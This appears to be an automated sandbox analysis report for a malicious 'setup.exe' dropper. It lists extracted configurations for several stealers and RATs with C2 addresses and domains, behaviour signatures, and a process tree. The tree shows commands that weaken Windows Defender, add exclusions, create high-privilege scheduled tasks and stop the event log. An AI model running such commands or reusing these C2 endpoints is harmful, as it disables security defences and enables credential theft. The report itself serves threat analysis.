Analysis
-
max time kernel
108s -
max time network
151s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
-
submitted
31-05-2024 15:22
General
-
Target
1717168876.1102788_setup.exe
-
Size
9.0MB
-
MD5
2679693a44171f58f1ad5fd96b903403
-
SHA1
e660ba95ac09e720ea84c237002b80b7a2990773
-
SHA256
7122e82a95211d24f9feed2e12beb42d81d8b61b9499417a278dcad34204fbf4
-
SHA512
42c23817dcbc4a62f7252c29645a77645e9511b17d7a1d1c9ddd85a1ca51e2851a022173e942a1841e9ceb46476868da285353d5d95ab3553788e7c334443670
-
SSDEEP
196608:jW40wYcvRpRZD9peQ8Ht0K9NYC1j7+27Sv7RML:jrvXDPb09GCVq4
Malware Config
Extracted
http://94.103.188.126/jerry/putty.zip
Extracted
stealc
Extracted
vidar
https://t.me/ta904ek
https://steamcommunity.com/profiles/76561199695752269
-
user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
Extracted
redline
LogsDiller Cloud (TG: @logsdillabot)
5.42.65.129:2353
Extracted
risepro
147.45.47.126:58709
Extracted
amadey
4.21
0e6740
http://147.45.47.155
-
install_dir
9217037dc9
-
install_file
explortu.exe
-
strings_key
8e894a8a4a3d0da8924003a561cfb244
-
url_paths
/ku4Nor9/index.php
Extracted
amadey
4.21
49e482
http://147.45.47.70
-
install_dir
1b29d73536
-
install_file
axplont.exe
-
strings_key
4d31dd1a190d9879c21fac6d87dc0043
-
url_paths
/tr8nomy/index.php
Extracted
redline
@LOGSCLOUDYT_BOT
185.172.128.33:8970
Extracted
redline
1
185.215.113.67:40960
Extracted
asyncrat
AsyncRAT
Fresh
pepecasas123.net:4608
AsyncMutex_5952
-
delay
3
-
install
false
-
install_folder
%AppData%
Extracted
lumma
https://fragmentyperspowp.shop/api
https://horsedwollfedrwos.shop/api
https://greetclassifytalk.shop/api
https://patternapplauderw.shop/api
https://understanndtytonyguw.shop/api
https://considerrycurrentyws.shop/api
https://messtimetabledkolvk.shop/api
https://detailbaconroollyws.shop/api
https://deprivedrinkyfaiir.shop/api
https://relaxtionflouwerwi.shop/api
https://roomabolishsnifftwk.shop/api
https://museumtespaceorsp.shop/api
https://buttockdecarderwiso.shop/api
https://averageaattractiionsl.shop/api
https://femininiespywageg.shop/api
https://employhabragaomlsp.shop/api
Signatures
-
Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
-
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
-
Detect Vidar Stealer 2 IoCs
-
Detected google phishing page
-
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
Lumma Stealer
An infostealer written in C++ first seen in August 2022.
-
Modifies firewall policy service 2 TTPs 1 IoCs
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 6 IoCs
-
RisePro
RisePro stealer is an infostealer distributed by PrivateLoader.
-
Stealc
Stealc is an infostealer written in C++.
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
-
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file
-
Stops running service(s) 4 TTPs
-
.NET Reactor proctector 2 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
-
Checks BIOS information in registry 2 TTPs 19 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
-
Drops startup file 1 IoCs
-
Executes dropped EXE 51 IoCs
-
Identifies Wine through registry keys 2 TTPs 9 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
-
Loads dropped DLL 3 IoCs
-
Modifies file permissions 1 TTPs 1 IoCs
-
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
VMProtect packed file 1 IoCs
Detects executables packed with VMProtect commercial packer.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 7 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops desktop.ini file(s) 1 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 16 IoCs
-
Looks up external IP address via web service 18 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
-
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
-
Drops file in System32 directory 14 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 14 IoCs
-
Suspicious use of SetThreadContext 17 IoCs
-
Drops file in Windows directory 10 IoCs
-
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 11 IoCs
-
Checks processor information in registry 2 TTPs 8 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 18 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 2 IoCs
-
Enumerates processes with tasklist 1 TTPs 1 IoCs
-
Enumerates system info in registry 2 TTPs 2 IoCs
-
Kills process with taskkill 1 IoCs
-
Modifies Internet Explorer settings 1 TTPs 2 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 64 IoCs
-
Modifies system certificate store 2 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: MapViewOfSection 8 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 7 IoCs
-
Suspicious use of SendNotifyMessage 5 IoCs
-
Suspicious use of SetWindowsHookEx 5 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
outlook_office_path 1 IoCs
-
outlook_win_path 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\1717168876.1102788_setup.exe"C:\Users\Admin\AppData\Local\Temp\1717168876.1102788_setup.exe"1⤵
- Modifies firewall policy service
- Checks computer location settings
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Documents\SimpleAdobe\k95rDX7JIz32ZT4MP0qAMnnd.exeC:\Users\Admin\Documents\SimpleAdobe\k95rDX7JIz32ZT4MP0qAMnnd.exe2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "RULTVSKP"3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "RULTVSKP" binpath= "C:\ProgramData\qhbnnmvggfhr\bkqtzupkspiy.exe" start= "auto"3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "RULTVSKP"3⤵
- Launches sc.exe
-
C:\Users\Admin\Documents\SimpleAdobe\uYkMa32B1u91LLN7h5L3nf9F.exeC:\Users\Admin\Documents\SimpleAdobe\uYkMa32B1u91LLN7h5L3nf9F.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\SimpleAdobe\oqPrqcF_p51Ikj_siE3FraAu.exeC:\Users\Admin\Documents\SimpleAdobe\oqPrqcF_p51Ikj_siE3FraAu.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\FHCBGIIJKEBF" & exit4⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 105⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Documents\SimpleAdobe\RtB9MYP8t4amoMeUJCbMNueE.exeC:\Users\Admin\Documents\SimpleAdobe\RtB9MYP8t4amoMeUJCbMNueE.exe2⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
-
C:\Users\Admin\Documents\SimpleAdobe\0gghPz1EUcJmAMhcLtDX9lXo.exeC:\Users\Admin\Documents\SimpleAdobe\0gghPz1EUcJmAMhcLtDX9lXo.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\katFCA0.tmpC:\Users\Admin\AppData\Local\Temp\katFCA0.tmp3⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Documents\SimpleAdobe\Q7qFtFVY2K4r9umtyxaQ24yo.exeC:\Users\Admin\Documents\SimpleAdobe\Q7qFtFVY2K4r9umtyxaQ24yo.exe2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.bat" "3⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\work.exework.exe -priverdD4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\loglraw.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\loglraw.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Documents\SimpleAdobe\iw8u1opPJN7Pkc6P5malXjlw.exeC:\Users\Admin\Documents\SimpleAdobe\iw8u1opPJN7Pkc6P5malXjlw.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
-
C:\Users\Admin\Documents\SimpleAdobe\WnjCFqAAnS73Rnx890A4gu_Q.exeC:\Users\Admin\Documents\SimpleAdobe\WnjCFqAAnS73Rnx890A4gu_Q.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zSF01D.tmp\Install.exe.\Install.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zSFC80.tmp\Install.exe.\Install.exe /GPdidQ "525403" /S4⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"5⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"6⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 67⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 68⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"6⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 67⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 68⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"6⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 67⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 68⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"6⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 67⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 68⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"6⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force9⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"5⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True8⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bxFWqzBdxtvvQVHpdf" /SC once /ST 15:24:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSFC80.tmp\Install.exe\" Ww /nDEdidhReo 525403 /S" /V1 /F5⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bxFWqzBdxtvvQVHpdf"5⤵
-
C:\Windows\SysWOW64\cmd.exe/C schtasks /run /I /tn bxFWqzBdxtvvQVHpdf6⤵
-
\??\c:\windows\SysWOW64\schtasks.exeschtasks /run /I /tn bxFWqzBdxtvvQVHpdf7⤵
-
C:\Users\Admin\Documents\SimpleAdobe\OY8hG23yWvB8e3p_R7S3vQHl.exeC:\Users\Admin\Documents\SimpleAdobe\OY8hG23yWvB8e3p_R7S3vQHl.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- Adds Run key to start application
- Drops file in System32 directory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH2663\MPGPH2663.exe" /tn "MPGPH2663 HR" /sc HOURLY /rl HIGHEST4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH2663\MPGPH2663.exe" /tn "MPGPH2663 LG" /sc ONLOGON /rl HIGHEST4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV2663_0cc175b9c0f1b6a831c399e269772661\MSIUpdaterV2663.exe" /tn "MSIUpdaterV2663_0cc175b9c0f1b6a831c399e269772661 HR" /sc HOURLY /rl HIGHEST4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV2663_0cc175b9c0f1b6a831c399e269772661\MSIUpdaterV2663.exe" /tn "MSIUpdaterV2663_0cc175b9c0f1b6a831c399e269772661 LG" /sc ONLOGON /rl HIGHEST4⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\spanp7kjceF5WFA4\AT6WXfXg5sU2A2a_rI29.exe"C:\Users\Admin\AppData\Local\Temp\spanp7kjceF5WFA4\AT6WXfXg5sU2A2a_rI29.exe"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"5⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe6⤵
-
C:\Users\Admin\Documents\SimpleAdobe\o0knUSxzudR3Tq9UfOSc18rp.exeC:\Users\Admin\Documents\SimpleAdobe\o0knUSxzudR3Tq9UfOSc18rp.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\SimpleAdobe\LsGwil3WNzxU5YCBRDcU87K9.exeC:\Users\Admin\Documents\SimpleAdobe\LsGwil3WNzxU5YCBRDcU87K9.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\JEHIJJKEGH.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\JEHIJJKEGH.exe"C:\Users\Admin\AppData\Local\Temp\JEHIJJKEGH.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\SimpleAdobe\zhrbwIHyj0mG5eqgBTMDpJrS.exeC:\Users\Admin\Documents\SimpleAdobe\zhrbwIHyj0mG5eqgBTMDpJrS.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\SimpleAdobe\4yaj2OVFSUGxBkSOXE6tGSpO.exeC:\Users\Admin\Documents\SimpleAdobe\4yaj2OVFSUGxBkSOXE6tGSpO.exe2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3304 -s 7643⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3304 -s 8203⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3304 -s 8363⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3304 -s 8563⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3304 -s 7923⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3304 -s 10963⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3304 -s 11523⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3304 -s 12883⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "4yaj2OVFSUGxBkSOXE6tGSpO.exe" /f & erase "C:\Users\Admin\Documents\SimpleAdobe\4yaj2OVFSUGxBkSOXE6tGSpO.exe" & exit3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "4yaj2OVFSUGxBkSOXE6tGSpO.exe" /f4⤵
- Kills process with taskkill
-
C:\Users\Admin\Documents\SimpleAdobe\H6gL7KerOKlEPHi2gj8fqXWg.exeC:\Users\Admin\Documents\SimpleAdobe\H6gL7KerOKlEPHi2gj8fqXWg.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-70255.tmp\H6gL7KerOKlEPHi2gj8fqXWg.tmp"C:\Users\Admin\AppData\Local\Temp\is-70255.tmp\H6gL7KerOKlEPHi2gj8fqXWg.tmp" /SL5="$70114,4747036,54272,C:\Users\Admin\Documents\SimpleAdobe\H6gL7KerOKlEPHi2gj8fqXWg.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\DD Sound Recorder\ddsoundrecorder.exe"C:\Users\Admin\AppData\Local\DD Sound Recorder\ddsoundrecorder.exe" -i4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\DD Sound Recorder\ddsoundrecorder.exe"C:\Users\Admin\AppData\Local\DD Sound Recorder\ddsoundrecorder.exe" -s4⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\SimpleAdobe\p17iTJJwQM2SJYHoGcTftXlW.exeC:\Users\Admin\Documents\SimpleAdobe\p17iTJJwQM2SJYHoGcTftXlW.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\SimpleAdobe\p17iTJJwQM2SJYHoGcTftXlW.exeC:\Users\Admin\Documents\SimpleAdobe\p17iTJJwQM2SJYHoGcTftXlW.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\5c67fbad-dfd9-427e-b4c4-a8bdb3fad3e0" /deny *S-1-1-0:(OI)(CI)(DE,DC)4⤵
- Modifies file permissions
-
C:\Users\Admin\Documents\SimpleAdobe\p17iTJJwQM2SJYHoGcTftXlW.exe"C:\Users\Admin\Documents\SimpleAdobe\p17iTJJwQM2SJYHoGcTftXlW.exe" --Admin IsNotAutoStart IsNotTask4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\SimpleAdobe\p17iTJJwQM2SJYHoGcTftXlW.exe"C:\Users\Admin\Documents\SimpleAdobe\p17iTJJwQM2SJYHoGcTftXlW.exe" --Admin IsNotAutoStart IsNotTask5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Documents\SimpleAdobe\BTPb3iIXgkgeSS1mxvY8Q8Bf.exeC:\Users\Admin\Documents\SimpleAdobe\BTPb3iIXgkgeSS1mxvY8Q8Bf.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
-
C:\Users\Admin\Documents\SimpleAdobe\Y9lpU2fmJ0wJe30pgWp5_Dl7.exeC:\Users\Admin\Documents\SimpleAdobe\Y9lpU2fmJ0wJe30pgWp5_Dl7.exe2⤵
- Drops startup file
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- outlook_office_path
- outlook_win_path
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_dd08d9de148da241a92ce8f1f016862a\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_dd08d9de148da241a92ce8f1f016862a HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_dd08d9de148da241a92ce8f1f016862a\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_dd08d9de148da241a92ce8f1f016862a LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\spanfPJ7anATNtDy\XL3daKScCsRX_OCO4X_8.exe"C:\Users\Admin\AppData\Local\Temp\spanfPJ7anATNtDy\XL3daKScCsRX_OCO4X_8.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_c743bb12f321204aca6c69356124da3d\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_c743bb12f321204aca6c69356124da3d HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_c743bb12f321204aca6c69356124da3d\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_c743bb12f321204aca6c69356124da3d LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\spanfPJ7anATNtDy\jYLqx88uvECKR5kVjcHa.exe"C:\Users\Admin\AppData\Local\Temp\spanfPJ7anATNtDy\jYLqx88uvECKR5kVjcHa.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
